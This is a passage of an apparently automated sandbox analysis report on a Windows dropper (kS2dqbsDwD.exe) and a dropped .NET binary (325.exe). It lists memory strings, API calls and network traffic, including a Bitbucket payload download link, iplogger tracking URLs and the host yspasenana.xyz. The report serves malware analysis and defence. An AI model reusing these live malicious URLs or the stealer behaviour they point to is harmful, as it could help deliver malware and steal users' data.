                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: http://yspasenana.xyz
                    Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: http://yspasenana.xyz/
                    Source: 325.exe, 0000000E.00000002.363745282.0000000002CC3000.00000004.00000001.sdmpString found in binary or memory: http://yspasenana.xyz4
                    Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: http://yspasenana.xyz:80/
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: 325.exe, 0000000E.00000002.363528899.0000000002BB6000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb
                    Source: 325.exe, 0000000E.00000002.363528899.0000000002BB6000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb/geoip
                    Source: 325.exe, 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                    Source: 325.exe, 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmpString found in binary or memory: https://aui-cdn.atlassian.com
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307696663.0000000002C1A000.00000004.00000001.sdmp, kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/c6138a8d-6b23-4fcf-ac63-5ded44dfc386/downloads/cf4ea471-f159-
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307255166.0000000000943000.00000004.00000001.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/is.gd
                    Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpString found in binary or memory: https://bitbucket.org/
                    Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp, kS2dqbsDwD.exe, 00000000.00000003.304898256.00000000008FA000.00000004.00000001.sdmpString found in binary or memory: https://bitbucket.org/luisadoma999/admin/downloads/325.exe
                    Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpString found in binary or memory: https://bitbucket.org/luisadoma999/admin/downloads/325.exelq
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmpString found in binary or memory: https://d301sr5gafysq2.cloudfront.net;
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: https://get.adob
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: https://helpx.ad
                    Source: 325.exe, 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307120909.00000000008FA000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/
                    Source: kS2dqbsDwD.exe, kS2dqbsDwD.exe, 00000000.00000002.307120909.00000000008FA000.00000004.00000001.sdmp, kS2dqbsDwD.exe, 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmpString found in binary or memory: https://iplogger.org/1Spbs7
                    Source: kS2dqbsDwD.exe, 00000000.00000003.304864468.00000000008C6000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/1Spbs7%A_AppData%
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307120909.00000000008FA000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/1Spbs7e
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307120909.00000000008FA000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/y
                    Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpString found in binary or memory: https://is.gd/
                    Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpString found in binary or memory: https://is.gd/b
                    Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp, kS2dqbsDwD.exe, 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmpString found in binary or memory: https://is.gd/nKi5S3
                    Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpString found in binary or memory: https://is.gd/nKi5S3$
                    Source: kS2dqbsDwD.exe, 00000000.00000003.304864468.00000000008C6000.00000004.00000001.sdmpString found in binary or memory: https://is.gd/nKi5S3%A_AppData%
                    Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpString found in binary or memory: https://is.gd/nKi5S3H
                    Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363595455.0000000002BEF000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363606561.0000000002BF3000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
                    Source: kS2dqbsDwD.exeString found in binary or memory: https://sectigo.com/CPS0C
                    Source: kS2dqbsDwD.exeString found in binary or memory: https://sectigo.com/CPS0D
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website;
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307334958.0000000000993000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.362868644.0000000000EAF000.00000004.00000020.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                    Source: unknownHTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.3:49711 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.25.234.53:443 -> 192.168.2.3:49712 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49713 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 52.217.201.169:443 -> 192.168.2.3:49715 version: TLS 1.2
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400053A0 GetTickCount,OpenClipboard,GetTickCount,OpenClipboard,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140005280 GetClipboardFormatNameW,GetClipboardData,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140042E80 GetSystemMetrics,GetSystemMetrics,GetDC,DestroyCursor,DeleteObject,GetIconInfo,DeleteObject,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,ReleaseDC,DeleteObject,SelectObject,DeleteDC,DeleteObject,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140011052 GetKeyboardState,
                    Source: 325.exe, 00000002.00000002.303820429.0000000000B58000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400018BA GlobalUnWire,CloseClipboard,SetTimer,GetTickCount,GetTickCount,GetMessageW,GetTickCount,GetFocus,TranslateAcceleratorW,GetKeyState,GetWindowLongW,GetKeyState,GetKeyState,GetKeyState,IsDlgButtonChecked,IsDlgButtonChecked,PostMessageW,IsDlgButtonChecked,IsDlgButtonChecked,IsDialogMessageW,GetTickCount,KillTimer,ShowWindow,GetTickCount,GetForegroundWindow,GetWindowThreadProcessId,GetClassNameW,IsDialogMessageW,SetCurrentDirectoryW,ShowWindow,DragQueryFileW,DragFinish,DragFinish,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CountClipboardFormats,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsDlgButtonChecked,ScreenToClient,IsDlgButtonChecked,IsDlgButtonChecked,GetWindowRect,MulDiv,MulDiv,GetWindowRect,GetWindowRect,GetWindowLongW,SetWindowLongW,MulDiv,MulDiv,IsDlgButtonChecked,ShowWindow,DragFinish,GetWindowLongW,SetWindowLongW,

                    System Summary:

                    barindex
                    .NET source code contains very large stringsShow sources
                    Source: 325.exe.0.dr, uNotepad/CollectionToSort.csLong String: Length: 32771
                    Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/CollectionToSort.csLong String: Length: 32771
                    Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/CollectionToSort.csLong String: Length: 32771
                    Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/CollectionToSort.csLong String: Length: 32771
                    Sample or dropped binary is a compiled AutoHotkey binaryShow sources
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeWindow found: window name: AutoHotkey
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140043AD0 RegisterClipboardFormatW,MoveWindow,GetSysColor,SetBkColor,SetTextColor,GetSysColorBrush,CreateCompatibleDC,SelectObject,BitBlt,SelectObject,DeleteDC,DrawIconEx,ExcludeClipRect,CreateRectRgn,GetClipRgn,GetSysColorBrush,FillRgn,DeleteObject,GetClipBox,FillRect,GetClientRect,MoveWindow,MoveWindow,MoveWindow,InvalidateRect,ShowWindow,GetMenu,CheckMenuItem,NtdllDefWindowProc_W,SendMessageTimeoutW,PostMessageW,PostMessageW,SendMessageTimeoutW,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004438A NtdllDefWindowProc_W,PostMessageW,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140043BF6 NtdllDefWindowProc_W,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140043C50 NtdllDefWindowProc_W,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140043C8B SetFocus,NtdllDefWindowProc_W,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140043CAC NtdllDefWindowProc_W,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140043CD9 NtdllDefWindowProc_W,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400492B0: CreateFileW,DeviceIoControl,CloseHandle,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400624E0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0095EB07
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0095EB07
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0095EB07
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0095EB07
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0095EB07
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0095EB07
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0095EB07
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0095EB07
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0095EB07
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140019030
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140060290
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400184C0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140004530
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400018BA
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140043AD0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140036D50
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140014FF0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400A7FF8
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140049040
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140053050
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D080
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140008140
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140083150
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400861F0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014003C220
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140042240
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014002B25C
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014000C260
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140048270
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004B270
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014008B280
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014000A2B0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400222C0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400132C0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004C2D0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400302E0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014000F2E0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014003A300
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140020316
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014005E330
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014003B32A
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014006C33D
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140033380
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140096390
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400563A0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400883F0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400B9420
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004A480
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400424B0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400414B0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400B04B4
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400344D0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140059510
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014005E580
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014002D585
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014001D5A9
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400695C0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400465D0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400665E0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140023630
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140058650
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014003B654
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400AE660
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014006D6A0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400C2698
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400C26B0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400C26A8
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400096E0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140056719
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400577A0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400727F0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140054860
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014005E8F0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140030910
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014006C920
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140006938
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014000693C
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140006940
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D990
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400059D0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014005F9F2
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140071A10
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140019A2E
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400BBA40
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140047AB0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140060AF0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140049B40
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400B7B9C
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014002FBFC
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140059C00
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140055C10
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014000CC10
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014005FC25
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140038C50
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004BC60
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400BDCA8
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014008BCD0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140041CD1
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140045CF0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400A7D2C
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004FD30
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014003ED70
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140079D90
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140065D90
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400A0DC0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014002ADE6
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140035E60
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140090E70
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140067E62
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140051E80
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140042E80
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140060EF0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004AF20
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014003CF20
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140010F60
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140046F70
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014001BF80
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140044FB0
                    Source: C:\Users\user\AppData\Roaming\325.exeCode function: 2_2_003B944F
                    Source: C:\Users\user\AppData\Roaming\325.exeCode function: 2_2_003B9D5B
                    Source: C:\Users\user\AppData\Roaming\325.exeCode function: 2_2_00B4C534
                    Source: C:\Users\user\AppData\Roaming\325.exeCode function: 2_2_00B4E975
                    Source: C:\Users\user\AppData\Roaming\325.exeCode function: 2_2_00B4E978
                    Source: C:\Users\user\AppData\Roaming\325.exeCode function: 2_2_028D0450
                    Source: C:\Users\user\AppData\Roaming\325.exeCode function: 2_2_04E9031C
                    Source: C:\Users\user\AppData\Roaming\325.exeCode function: 2_2_04E9C087
                    Source: C:\Users\user\AppData\Roaming\325.exeCode function: 2_2_04E9C098
                    Source: C:\Users\user\AppData\Roaming\325.exeCode function: 14_2_006B944F
                    Source: C:\Users\user\AppData\Roaming\325.exeCode function: 14_2_006B9D5B
                    Source: C:\Users\user\AppData\Roaming\325.exeCode function: 14_2_02B4D448
                    Source: C:\Users\user\AppData\Roaming\325.exeCode function: 14_2_02B4CB50
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\325.exe 20E702B077D7CF9780192671268C321BB0A76BAEC0A731413A1F04F735EEDCE3
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: String function: 00000001400A6D70 appears 354 times
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: String function: 0000000140086C40 appears 51 times
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: String function: 00000001400A4F28 appears 34 times
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: String function: 00000001400A9358 appears 45 times
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: String function: 0000000140035BF0 appears 107 times
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: String function: 0000000140035870 appears 77 times
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: String function: 00000001400C2598 appears 38 times
                    Source: kS2dqbsDwD.exeStatic PE information: invalid certificate
                    Source: kS2dqbsDwD.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: kS2dqbsDwD.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
